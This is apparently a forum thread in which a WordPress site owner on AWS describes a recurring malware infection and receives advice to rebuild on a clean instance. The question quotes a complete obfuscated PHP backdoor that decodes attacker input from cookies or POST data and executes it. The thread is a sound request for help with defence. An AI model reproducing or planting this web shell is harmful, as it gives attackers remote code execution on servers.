We have some malware on our aws (hosting Wordpress and own application) instance which is doing strange things:
chmod 755 /var/www/htmlindependently of what it was beforecopies index.html to index.html.bak.bak and deletes index.html When I run ausearch on index.html, I get directed to a folder managed by our application that contains an object with randomname.php, like mqnwtxzg.php. Contents of such php file:
$wezhgja = 'incsr_f8y-g6a9kl3ubx\'5vp14d7mt*#oHe';$lcxtas = Array();$lcxtas[] = $wezhgja[2].$wezhgja[6].$wezhgja[2].$wezhgja[21].$wezhgja[27].$wezhgja[18].$wezhgja[11].$wezhgja[27].$wezhgja[9].$wezhgja[27].$wezhgja[24].$wezhgja[25].$wezhgja[2].$wezhgja[9].$wezhgja[25].$wezhgja[21].$wezhgja[13].$wezhgja[11].$wezhgja[9].$wezhgja[13].$wezhgja[7].$wezhgja[27].$wezhgja[12].$wezhgja[9].$wezhgja[24].$wezhgja[16].$wezhgja[18].$wezhgja[21].$wezhgja[24].$wezhgja[18].$wezhgja[18].$wezhgja[2].$wezhgja[25].$wezhgja[18].$wezhgja[24].$wezhgja[2];$lcxtas[] = $wezhgja[2].$wezhgja[4].$wezhgja[34].$wezhgja[12].$wezhgja[29].$wezhgja[34].$wezhgja[5].$wezhgja[6].$wezhgja[17].$wezhgja[1].$wezhgja[2].$wezhgja[29].$wezhgja[0].$wezhgja[32].$wezhgja[1];$lcxtas[] = $wezhgja[33].$wezhgja[30];$lcxtas[] = $wezhgja[31];$lcxtas[] = $wezhgja[2].$wezhgja[32].$wezhgja[17].$wezhgja[1].$wezhgja[29];$lcxtas[] = $wezhgja[3].$wezhgja[29].$wezhgja[4].$wezhgja[5].$wezhgja[4].$wezhgja[34].$wezhgja[23].$wezhgja[34].$wezhgja[12].$wezhgja[29];$lcxtas[] = $wezhgja[34].$wezhgja[19].$wezhgja[23].$wezhgja[15].$wezhgja[32].$wezhgja[26].$wezhgja[34];$lcxtas[] = $wezhgja[3].$wezhgja[17].$wezhgja[18].$wezhgja[3].$wezhgja[29].$wezhgja[4];$lcxtas[] = $wezhgja[12].$wezhgja[4].$wezhgja[4].$wezhgja[12].$wezhgja[8].$wezhgja[5].$wezhgja[28].$wezhgja[34].$wezhgja[4].$wezhgja[10].$wezhgja[34];$lcxtas[] = $wezhgja[3].$wezhgja[29].$wezhgja[4].$wezhgja[15].$wezhgja[34].$wezhgja[1];$lcxtas[] = $wezhgja[23].$wezhgja[12].$wezhgja[2].$wezhgja[14];foreach ($lcxtas[8]($_COOKIE, $_POST) as $tlfwyg => $bdxjqs){function irgndu($lcxtas, $tlfwyg, $zskgpvt){return $lcxtas[7]($lcxtas[5]($tlfwyg . $lcxtas[0], ($zskgpvt / $lcxtas[9]($tlfwyg)) + 1), 0, $zskgpvt);}function fpdyn($lcxtas, $eklrh){return @$lcxtas[10]($lcxtas[2], $eklrh);}function zmychft($lcxtas, $eklrh){$rugfslb = $lcxtas[4]($eklrh) % 3;if (!$rugfslb) {$zttttc = $lcxtas[1]; $tdber = $zttttc("", $eklrh[1]($eklrh[2]));$tdber();exit();}}$bdxjqs = fpdyn($lcxtas, $bdxjqs);zmychft($lcxtas, $lcxtas[6]($lcxtas[3], $bdxjqs ^ irgndu($lcxtas, $tlfwyg, $lcxtas[9]($bdxjqs))));}In another random folder I find objects like these: /somefolder/.5d45a5b3.ico
We regularly check for this stuff and delete all these strange objects, but a day or so later, they are back again. Only thing that changed is that the strange objects have now different names and are placed in different folders.
We are running malware scans on our system and they detect these objects, but nothing so far prevents them from coming back.
Did anyone experience similar problems and can anyone recommend anything to get rid of this stuff?
Can anyone guide us to someone who can help, even if that service would be payable?
Instead of fixing the symptoms you should direct your focus on making sure that your Wordpress installation is the latest version and update any plugins to the latest version. Considering the current system is compromised, do not try to "patch it". It is likely backdoor'ed. Do not trust it. Make a back up of the data instead (e.g. the database) and rebuild the wordpress site on a new instance using the latest versions.
Have a look at https://wordpress.org/support/article/faq-my-site-was-hacked/ and https://wordpress.org/support/article/hardening-wordpress/